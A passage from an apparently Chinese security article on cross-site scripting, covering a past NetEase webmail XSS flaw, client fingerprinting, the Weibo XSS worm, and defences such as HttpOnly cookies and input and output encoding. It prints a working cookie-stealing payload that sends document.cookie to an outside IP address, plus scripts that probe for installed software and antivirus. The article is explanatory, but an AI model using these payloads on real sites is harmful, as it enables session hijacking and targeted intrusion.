SessionID=6010D6F2F7B24A182EC3DF53E65C88FCA17B0A96FAE129C3黑客则可以通过XSS跨站脚本攻击的方式将嵌入恶意代码的页面发送给用户,当用户点击浏览时,黑客即可获取用户的Cookie信息并用该信息欺骗服务器端,无需账号密码即可直接成功登录。这里我们以网易邮箱的XSS跨站脚本攻击漏洞为例进行分析和描述。网易邮箱老版本中,曾经存在一个XSS跨站脚本攻击漏洞,黑客可以构造如下代码:<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:xx=new Image();xx.src='http://61.130.75.239/pic/163.asp?url='+escape(document.URL)+'&cookie='+escape(document.cookie);" width=0 height=0>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>并将包含有如图8所示恶意代码的邮件发送至网易邮箱用户时,用户打开了含有恶意代码的邮件后,代码就会自动将用户的cookie信息发送到61.130.75.239上的163.asp文件,其中163.asp的作用是记录发送过来的Cookie,记录的Cookie内容如下图9所示:在接收到Cookie以后,就可以通过Cookie欺骗的方式实现登录目标邮箱了,如图10所示。XSS跨站脚本攻击搜集客户端环境信息搜集客户端环境信息在更多的时候主要应用于指定目标的渗透攻击或网络挂马攻击,如了解客户端环境所使用的浏览器信息、操作系统信息、组件是否安装以及安全防护软件安装情况等。通过XSS跨站脚本攻击可以更加方便、快速地实现客户端环境信息的收集。那么如何通过javascript收集以上信息呢?我们构造如下脚本代码,并在浏览器中执行这段代码。<script> alert(navigator.userAgent); </script>得到的结果如下图11所示。这个信息中告诉了我们以上关心的两个信息,一个是浏览器的类型和版本,另外一个是客户端环境操作系统的版本。浏览器:MSIE 8.0(微软IE浏览器,浏览器版本是8.0)操作系统:Windows NT 6.1(操作系统类型是windows 7)通过以上方式可以获取客户端的浏览器和操作系统信息,接下来我们在继续判断客户端环境组件安装情况。构造代码如下:<script> try{ var object = new ActiveXObject(“XunLeiBHO.ThunderIEHelper”); } catch(e){ alert(“迅雷软件未安装”); } </script>客户端环境中如果安装迅雷下载软件的话,那么就会安装相应的ActiveX控件XunLeiBHO.ThunderIEHelper,以上脚本的作用即是通过网页脚本去加载迅雷的ActiveX控件,如果控件存在则不会抛出异常,否则就会抛出异常并被脚本捕获,运行上面的脚本代码时,安装有迅雷的环境不会有任何提示,未安装迅雷的环境就会弹窗提示“迅雷软件未安装”。控件判断可以通过网页加载ActiveX控件的方式实现,那么怎么通过脚本判断客户端环境中是否安装了安全软件呢?这里我们以瑞星安全软件为例,分析描述如何通过XSS跨站脚本攻击漏洞的利用检测客户端环境是否存在瑞星安全软件。我们构造代码如下:<script> var havesoft=false; var disk=['c','d']; var soft=[':\\Program Files\\Rising\\Ris\\BackRav.dll/2/30994']; for(i=0;i<soft.length;i++) { for(j=0;j<disk.length;j++) { var img=new Image(); res=’res://’+disk[j]+soft[i]; img.src=res; if(img.height!=30) { havesoft=true; } } } </script>以上代码的作用是通过javascript结合res协议对客户端环境中的资源文件进行加载,javascript脚本运行后,会对客户端环境的C、D盘进行访问,访问是否存在瑞星默认安装路径的资源文件,并尝试对资源文件进行加载,如果加载成功,则说明资源文件存在,也说明瑞星安全软件的存在,并将变量havesoft置为真,脚本检测结束后,只需要检测该变量是否为真即可。XSS Worm相对于以上三种情况,可以说是XSS蠕虫(XSS Worm)的破坏力和影响力都是巨大的。XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。谈到XSS蠕虫就很有必要介绍一下新浪微博遭受XSS蠕虫攻击事件,同时我们也以此次攻击事件作为例子,对黑客恶意利用漏洞至XSS蠕虫大范围扩散的过程进行详细分析和描述,并对该XSS蠕虫的恶意脚本文件进行一下简要的分析。此处请参见拙作《从新浪微博被攻击事件看SNS网站的安全问题(下)》,不再赘述。XSS跨站脚本攻击的防范通过以上针对不同种情况的XSS跨站脚本攻击的描述,我们了解到了在复杂的Web环境中,XSS的利用是千变万化的,如何能够有效地防范XSS跨站脚本攻击问题一直都是浏览器厂商和网站安全技术人员关注的热门话题。现在很多浏览器厂商都在自己的程序中增加了防范XSS跨站脚本攻击的措施,如IE浏览器从IE8开始内置了XSS筛选器,Firefox也有相应的CSP、Noscript扩展等。而对于网站的安全技术人员来说,提出高效的技术解决方案,保护用户免受XSS跨站脚本攻击才是关键。下面我们结合网站安全设计,描述一下如何通过技术手段实现XSS跨站脚本攻击的防范。利用HttpOnlyHttpOnly最初是由微软提出的,目前已经被多款流行浏览器厂商所采用。HttpOnly的作用不是过滤XSS跨站脚本攻击,而是浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie,解决XSS跨站脚本攻击后的Cookie会话劫持行为。httpOnly是在Set-Cookie时进行标记的,设置的Cookie头格式如下:Set-Cookie: <name>=<value>[; <name>=<value>] [; expires=<date>][; domain=<domain_name>] [; path=<some_path>][; secure][; HttpOnly]以php为例,在php 5.2版本时就已经在Setcookie函数加入了对HttpOnly的支持,如<?php setcookie(“user”, “admin”, NULL, NULL, NULL, NULL, TRUE); ?>通过以上代码就可以设置user这个cookie,将其设置为HttpOnly,setcookie函数实质是通过向客户端发送原始的HTTP报文头进行设置的,document将不可见这个Cookie,所以使用document.cookie就取不到这个Cookie,也就是先了对Cookie的保护。完善的输入和输出检查由于三种XSS跨站脚本攻击类型的漏洞成因可不相同,针对输入输出的检查一部分适用于反射型XSS与存储型XSS,而另外一些检查适用于基于DOM的XSS。A. 防范反射型XSS和存储型XSS输入检查在大多数的时候都是对可信字符的检查或输入数据格式的检查,如用户输入的注册账号信息中只允许包括字母、数字、下划线和汉字等,对于输入的一切非白名单内的字符均认为是非法输入。数据格式如输入的IP地址、电话号码、邮件地址、日期等数据都具有一定的格式规范,只有符合数据规范的输入信息才允许通过检查。输出检查主要是针对数据展示过程中,应该对数据信息进行HTML编码处理,将可能存在导致XSS跨站脚本攻击的恶意字符进行编码,在不影响正常数据显示的前提条件下,过滤恶意字符。常见的可能造成XSS跨站脚本攻击的字符及其HTML编码如下:“ " ‘ ' & & < < > > 除了常用的编码外,任何字符都可以使用其ASCII码进行HTML编码,如 % % * *<script> var str = document.URL; str = str.substring(str.indexOf(“username=”)+9, str.length); str = unescape(str); var regex=/^([A-Za-z0-9+\s])*$/; if (regex.test(str)) document.write(str); </script>同样,我们也可以通过在服务端实现类似上述数据检查的功能,如在服务器端检测URL参数是否为预定的参数username,并对username参数的内容进行检测,确认数据内容是否为只包含数字、字母和空格符,实现服务端的数据过滤。但是,由于客户端数据的可控性,这种服务端检测的效果要明显弱于客户端检测。基于DOM的XSS输出检查与反射型XSS漏洞输出检查的方法相似,在将用户可控的DOM数据内容插入到文档之前,Web应用程序应对提交的数据进行HTML编码处理,将用户提交的数据中可能存在的各种危险字符和表达式进行过滤以安全的方式插入到文档中进行展现,如可以通过如下函数实现在客户端javascript中执行HTML编码处理。function jsEncode(str) { var d = document.createElement(‘div’); d.appendChild(document.createTextNode(str)); return d.innerHTML; }XSS跨站脚本攻击作为Web应用安全领域中最大威胁之一,不仅仅危害Web应用业务的正常运营,对访问Web应用业务的客户端环境和用户也带来了直接安全影响。虽然XSS跨站脚本攻击在复杂的Web应用环境中利用方式千变万化,但是网络安全人员通过对Web应用的各种环境进行详细分析和处理,完全阻断XSS跨站脚本攻击是可以实现的。如何有效防范和阻止XSS跨站脚本攻击,保障Web应用系统的业务安全和正常运营,保护客户端用户免受XSS跨站脚本攻击行为的侵害,是Web应用系统管理人员和网络安全产品开发人员的共同职责。
